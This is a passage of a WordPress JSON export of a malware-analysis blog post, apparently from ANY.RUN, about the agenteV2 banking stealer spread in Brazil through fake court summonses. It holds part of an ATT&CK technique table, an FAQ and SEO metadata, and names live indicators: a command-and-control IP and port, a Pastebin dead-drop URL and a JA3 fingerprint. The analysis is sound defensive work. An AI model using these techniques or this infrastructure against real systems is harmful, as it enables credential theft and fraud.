data-col-index=\"0\"\n                    data-row-index=\"15\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1012                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B16\"\n                    data-col-index=\"1\"\n                    data-row-index=\"15\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tQuery\t\t\tRegistry                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C16\"\n                    data-col-index=\"2\"\n                    data-row-index=\"15\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tDiscovery                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D16\"\n                    data-col-index=\"3\"\n                    data-row-index=\"15\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t\u2014                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E16\"\n                    data-col-index=\"4\"\n                    data-row-index=\"15\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t84,457\t\t\tregistry reads observed in sandbox                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A17\"\n                    data-col-index=\"0\"\n                    data-row-index=\"16\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1082                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B17\"\n                    data-col-index=\"1\"\n                    data-row-index=\"16\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tSystem\t\t\tInformation Discovery                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C17\"\n                    data-col-index=\"2\"\n                    data-row-index=\"16\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tDiscovery                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D17\"\n                    data-col-index=\"3\"\n                    data-row-index=\"16\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t\u2014                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E17\"\n                    data-col-index=\"4\"\n                    data-row-index=\"16\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tpsutil\t\t\t+ WMI: hostname, UUID, OS version, process list                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A18\"\n                    data-col-index=\"0\"\n                    data-row-index=\"17\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1083                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B18\"\n                    data-col-index=\"1\"\n                    data-row-index=\"17\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tFile\t\t\tand Directory Discovery                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C18\"\n                    data-col-index=\"2\"\n                    data-row-index=\"17\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tDiscovery                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D18\"\n                    data-col-index=\"3\"\n                    data-row-index=\"17\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t\u2014                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E18\"\n                    data-col-index=\"4\"\n                    data-row-index=\"17\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tScans\t\t\tall browser profiles across all user directories                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A19\"\n                    data-col-index=\"0\"\n                    data-row-index=\"18\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1057                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B19\"\n                    data-col-index=\"1\"\n                    data-row-index=\"18\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tProcess\t\t\tDiscovery                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C19\"\n                    data-col-index=\"2\"\n                    data-row-index=\"18\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tDiscovery                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D19\"\n                    data-col-index=\"3\"\n                    data-row-index=\"18\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t\u2014                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E19\"\n                    data-col-index=\"4\"\n                    data-row-index=\"18\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tpsutil\t\t\tenumerates running processes terminates browsers before DB file\t\t\taccess                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A20\"\n                    data-col-index=\"0\"\n                    data-row-index=\"19\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1518.001                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B20\"\n                    data-col-index=\"1\"\n                    data-row-index=\"19\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tSecurity\t\t\tSoftware Discovery                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C20\"\n                    data-col-index=\"2\"\n                    data-row-index=\"19\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tDiscovery                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D20\"\n                    data-col-index=\"3\"\n                    data-row-index=\"19\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t.001                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E20\"\n                    data-col-index=\"4\"\n                    data-row-index=\"19\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tQueries\t\t\tdisk paths for Diebold Warsaw and GbPlugin anti-fraud solutions                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A21\"\n                    data-col-index=\"0\"\n                    data-row-index=\"20\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1102.001                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B21\"\n                    data-col-index=\"1\"\n                    data-row-index=\"20\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tWeb\t\t\tService: Dead Drop Resolver                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C21\"\n                    data-col-index=\"2\"\n                    data-row-index=\"20\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tC2                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D21\"\n                    data-col-index=\"3\"\n                    data-row-index=\"20\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t.001                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E21\"\n                    data-col-index=\"4\"\n                    data-row-index=\"20\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tpastebin.com\/raw\/0RmxqY57\t\t\tresolves to real C2 IP:port                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-bc-EDC1C1 wpdt-fs-000012\"\n                                            data-cell-id=\"A22\"\n                    data-col-index=\"0\"\n                    data-row-index=\"21\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1071.001                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B22\"\n                    data-col-index=\"1\"\n                    data-row-index=\"21\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tApp\t\t\tLayer Protocol: WebSocket                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C22\"\n                    data-col-index=\"2\"\n                    data-row-index=\"21\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tC2                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D22\"\n                    data-col-index=\"3\"\n                    data-row-index=\"21\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t.001                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E22\"\n                    data-col-index=\"4\"\n                    data-row-index=\"21\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tPersistent\t\t\tuws:\/\/ WebSocket connection to 38.242.246.176:8443 bidirectional\t\t\treal-time C2                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-311'>\ntable#wpdtSimpleTable-311{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-311 td, table.wpdtSimpleTable311 th { white-space: normal !important; }\n.wpdt-bc-E91E63 { background-color: #E91E63 !important;}\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n.wpdt-bc-EFC2C2 { background-color: #EFC2C2 !important;}\n.wpdt-bc-EDC1C1 { background-color: #EDC1C1 !important;}\n<\/style>\n\n\n\n\n<h2 class=\"wp-block-heading\">FAQ<\/h2>\n\n\n\n<div class=\"schema-faq wp-block-yoast-faq-block\"><div class=\"schema-faq-section\" id=\"faq-question-1777028022700\"><strong class=\"schema-faq-question\"><strong>Who is targeted by this campaign?<\/strong><\/strong> <p class=\"schema-faq-answer\">This campaign targets Brazilian individuals and organizations \u2014 anyone who might receive what appears to be an official court summons. The lure is broad (civil conciliation hearing, not targeted spearphishing), meaning any employee in Brazil could be a victim. <\/p> <\/div> <div class=\"schema-faq-section\" id=\"faq-question-1777028100417\"><strong class=\"schema-faq-question\"><strong>My organization doesn&#8217;t do banking in Brazil. Should we still care?<\/strong><\/strong> <p class=\"schema-faq-answer\">Yes. The stealer harvests all browser-saved credentials \u2014 not just banking ones \u2014 across all Chromium-based browser profiles. Corporate credentials stored in browser password managers (email, SaaS platforms, VPNs, internal portals) are all at risk. Additionally, the malware installs a full remote shell, meaning a successful infection grants the attacker persistent, elevated access to the corporate endpoint regardless of banking activity.<\/p> <\/div> <div class=\"schema-faq-section\" id=\"faq-question-1777028296008\"><strong class=\"schema-faq-question\"><strong>How quickly can an attacker conduct financial fraud after initial infection?<\/strong><\/strong> <p class=\"schema-faq-answer\">Very quickly. The malware begins beaconing to C2 within approximately 30 seconds of the VBS file being executed. Once the operator&#8217;s WebSocket session is established, they can view the victim&#8217;s screen in real time. If a banking session is already open in the browser, fraud could occur within minutes. The operator is not automated \u2014 they are watching and waiting, which means they will time their intervention to maximize impact (e.g., during an active funds transfer).<\/p> <\/div> <div class=\"schema-faq-section\" id=\"faq-question-1777028519139\"><strong class=\"schema-faq-question\">We blocked the C2 IP (38.242.246.176). Are we protected?<\/strong> <p class=\"schema-faq-answer\">Partially. Blocking the known C2 IP prevents beaconing to the current infrastructure, but the Pastebin dead-drop resolver means the attacker can rotate to a new IP simply by editing a public Pastebin page \u2014 without touching any already-deployed malware. Blocking the specific Pastebin URL (pastebin.com\/raw\/0RmxqY57) and monitoring for TLS connections to port 8443 from non-browser processes provides more durable protection. The JA3 fingerprint (a48c0d5f95b1ef98f560f324fd275da1) is particularly valuable as it will detect agenteV2&#8217;s TLS handshake regardless of IP rotation.<\/p> <\/div> <div class=\"schema-faq-section\" id=\"faq-question-1777028533483\"><strong class=\"schema-faq-question\">How can ANY.RUN help us detect, investigate, and respond to this threat?<\/strong> <p class=\"schema-faq-answer\">ANY.RUN&#8217;s Interactive Sandbox was used to conduct the full dynamic analysis in this report \u2014 providing complete visibility into the infection chain, process trees, API traces, network connections, and registry modifications. For ongoing defense: TI Lookup lets analysts query all IOCs from this report for correlated intelligence; TI Feeds push live indicators into your SIEM\/SOAR\/EDR for automated blocking; and the YARA rule in section 9.3 can be deployed to automatically detect new agenteV2 variants. The Enterprise suite combines all these capabilities in a unified platform designed for security teams that need to investigate and respond at scale.<\/p> <\/div> <\/div>\n","protected":false},"excerpt":{"rendered":"<p>Editor\u2019s note:&nbsp;The analysis is authored by Moises Cerqueira, malware researcher &amp; threat hunter. You can&nbsp;find Moises on LinkedIn and X. A new phishing campaign targeting Brazilian users&nbsp;demonstrates&nbsp;how modern financial malware has evolved from simple credential theft into full-scale, operator-driven fraud platforms. Disguised as a judicial summons,&nbsp;this campaign leverages social engineering, multi-stage malware delivery, and real-time [&hellip;]<\/p>\n","protected":false},"author":19,"featured_media":20344,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[57,94,10,58,95,34,40,63],"class_list":["post-20342","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-anyrun","tag-brazil","tag-cybersecurity","tag-cybersecurity-training","tag-finance","tag-malware-analysis","tag-malware-behavior","tag-phishing"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.10 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Brazilian Phishing Campaign Deploys agenteV2 Stealer<\/title>\n<meta name=\"description\" content=\"Brazilian phishing delivers agenteV2: a Nuitka-compiled banking stealer targeting major banks with live screen streaming via WebSocket.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Moises Cerqueira (0xOlympus)\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"23 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/\"},\"author\":{\"name\":\"Moises Cerqueira (0xOlympus)\",\"@id\":\"https:\/\/any.run\/\"},\"headline\":\"Inside\u00a0agenteV2: How Brazilian Attackers Use Fake Court Summons to Steal Banking Credentials in Real Time\u00a0\",\"datePublished\":\"2026-04-24T11:02:39+00:00\",\"dateModified\":\"2026-04-24T13:18:55+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/\"},\"wordCount\":5226,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"keywords\":[\"ANYRUN\",\"brazil\",\"cybersecurity\",\"cybersecurity training\",\"finance\",\"malware analysis\",\"malware behavior\",\"phishing\"],\"articleSection\":[\"Malware Analysis\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#respond\"]}]},{\"@type\":[\"WebPage\",\"FAQPage\"],\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/\",\"name\":\"Brazilian Phishing Campaign Deploys agenteV2 Stealer\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/\"},\"datePublished\":\"2026-04-24T11:02:39+00:00\",\"dateModified\":\"2026-04-24T13:18:55+00:00\",\"description\":\"Brazilian phishing delivers agenteV2: a Nuitka-compiled banking stealer targeting major banks with live screen streaming via WebSocket.\",\"breadcrumb\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#breadcrumb\"},\"mainEntity\":[{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028022700\"},{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028100417\"},{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028296008\"},{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028519139\"},{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028533483\"}],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware Analysis\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Inside\u00a0agenteV2: How Brazilian Attackers Use Fake Court Summons to Steal Banking Credentials in Real Time\u00a0\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN&#039;s Cybersecurity Blog\",\"description\":\"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.\",\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/any.run\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"url\":\"https:\/\/any.run\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"width\":1,\"height\":1,\"caption\":\"ANY.RUN\"},\"image\":{\"@id\":\"https:\/\/any.run\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/www.any.run\/\",\"https:\/\/twitter.com\/anyrun_app\",\"https:\/\/www.linkedin.com\/company\/30692044\",\"https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"Moises Cerqueira (0xOlympus)\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/Moises.jpg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/Moises.jpg\",\"caption\":\"Moises Cerqueira (0xOlympus)\"},\"description\":\"Malware Researcher & Threat Hunter with a strong background in Blue Team operations. Specialized in malware analysis and reverse engineering, with hands-on experience dissecting binaries and reconstructing attacker TTPs from initial delivery to command-and-control communication. Driven by a deep interest in adversary tradecraft, bridging low-level technical analysis with strategic threat intelligence and detection engineering. Follow Moises on: LinkedIn X Website\",\"sameAs\":[\"https:\/\/0xdelta.org\/\"],\"url\":\"#molongui-disabled-link\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028022700\",\"position\":1,\"url\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028022700\",\"name\":\"Who is targeted by this campaign?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"This campaign targets Brazilian individuals and organizations \u2014 anyone who might receive what appears to be an official court summons. The lure is broad (civil conciliation hearing, not targeted spearphishing), meaning any employee in Brazil could be a victim. \",\"inLanguage\":\"en-US\"},\"inLanguage\":\"en-US\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028100417\",\"position\":2,\"url\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028100417\",\"name\":\"My organization doesn't do banking in Brazil. Should we still care?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Yes. The stealer harvests all browser-saved credentials \u2014 not just banking ones \u2014 across all Chromium-based browser profiles. Corporate credentials stored in browser password managers (email, SaaS platforms, VPNs, internal portals) are all at risk. Additionally, the malware installs a full remote shell, meaning a successful infection grants the attacker persistent, elevated access to the corporate endpoint regardless of banking activity.\",\"inLanguage\":\"en-US\"},\"inLanguage\":\"en-US\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028296008\",\"position\":3,\"url\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028296008\",\"name\":\"How quickly can an attacker conduct financial fraud after initial infection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Very quickly. The malware begins beaconing to C2 within approximately 30 seconds of the VBS file being executed. Once the operator's WebSocket session is established, they can view the victim's screen in real time. If a banking session is already open in the browser, fraud could occur within minutes. The operator is not automated \u2014 they are watching and waiting, which means they will time their intervention to maximize impact (e.g., during an active funds transfer).\",\"inLanguage\":\"en-US\"},\"inLanguage\":\"en-US\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028519139\",\"position\":4,\"url\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028519139\",\"name\":\"We blocked the C2 IP (38.242.246.176). Are we protected?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Partially. Blocking the known C2 IP prevents beaconing to the current infrastructure, but the Pastebin dead-drop resolver means the attacker can rotate to a new IP simply by editing a public Pastebin page \u2014 without touching any already-deployed malware. Blocking the specific Pastebin URL (pastebin.com\/raw\/0RmxqY57) and monitoring for TLS connections to port 8443 from non-browser processes provides more durable protection. The JA3 fingerprint (a48c0d5f95b1ef98f560f324fd275da1) is particularly valuable as it will detect agenteV2's TLS handshake regardless of IP rotation.\",\"inLanguage\":\"en-US\"},\"inLanguage\":\"en-US\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028533483\",\"position\":5,\"url\":\"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028533483\",\"name\":\"How can ANY.RUN help us detect, investigate, and respond to this threat?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"ANY.RUN's Interactive Sandbox was used to conduct the full dynamic analysis in this report \u2014 providing complete visibility into the infection chain, process trees, API traces, network connections, and registry modifications. For ongoing defense: TI Lookup lets analysts query all IOCs from this report for correlated intelligence; TI Feeds push live indicators into your SIEM\/SOAR\/EDR for automated blocking; and the YARA rule in section 9.3 can be deployed to automatically detect new agenteV2 variants. The Enterprise suite combines all these capabilities in a unified platform designed for security teams that need to investigate and respond at scale.\",\"inLanguage\":\"en-US\"},\"inLanguage\":\"en-US\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Brazilian Phishing Campaign Deploys agenteV2 Stealer","description":"Brazilian phishing delivers agenteV2: a Nuitka-compiled banking stealer targeting major banks with live screen streaming via WebSocket.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/","twitter_misc":{"Written by":"Moises Cerqueira (0xOlympus)","Est. reading time":"23 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#article","isPartOf":{"@id":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/"},"author":{"name":"Moises Cerqueira (0xOlympus)","@id":"https:\/\/any.run\/"},"headline":"Inside\u00a0agenteV2: How Brazilian Attackers Use Fake Court Summons to Steal Banking Credentials in Real Time\u00a0","datePublished":"2026-04-24T11:02:39+00:00","dateModified":"2026-04-24T13:18:55+00:00","mainEntityOfPage":{"@id":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/"},"wordCount":5226,"commentCount":0,"publisher":{"@id":"https:\/\/any.run\/"},"keywords":["ANYRUN","brazil","cybersecurity","cybersecurity training","finance","malware analysis","malware behavior","phishing"],"articleSection":["Malware Analysis"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#respond"]}]},{"@type":["WebPage","FAQPage"],"@id":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/","url":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/","name":"Brazilian Phishing Campaign Deploys agenteV2 Stealer","isPartOf":{"@id":"https:\/\/any.run\/"},"datePublished":"2026-04-24T11:02:39+00:00","dateModified":"2026-04-24T13:18:55+00:00","description":"Brazilian phishing delivers agenteV2: a Nuitka-compiled banking stealer targeting major banks with live screen streaming via WebSocket.","breadcrumb":{"@id":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#breadcrumb"},"mainEntity":[{"@id":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028022700"},{"@id":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028100417"},{"@id":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028296008"},{"@id":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028519139"},{"@id":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028533483"}],"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/any.run\/cybersecurity-blog\/"},{"@type":"ListItem","position":2,"name":"Malware Analysis","item":"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/"},{"@type":"ListItem","position":3,"name":"Inside\u00a0agenteV2: How Brazilian Attackers Use Fake Court Summons to Steal Banking Credentials in Real Time\u00a0"}]},{"@type":"WebSite","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/","name":"ANY.RUN&#039;s Cybersecurity Blog","description":"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.","publisher":{"@id":"https:\/\/any.run\/"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/any.run\/?s={search_term_string}"},"query-input":"required 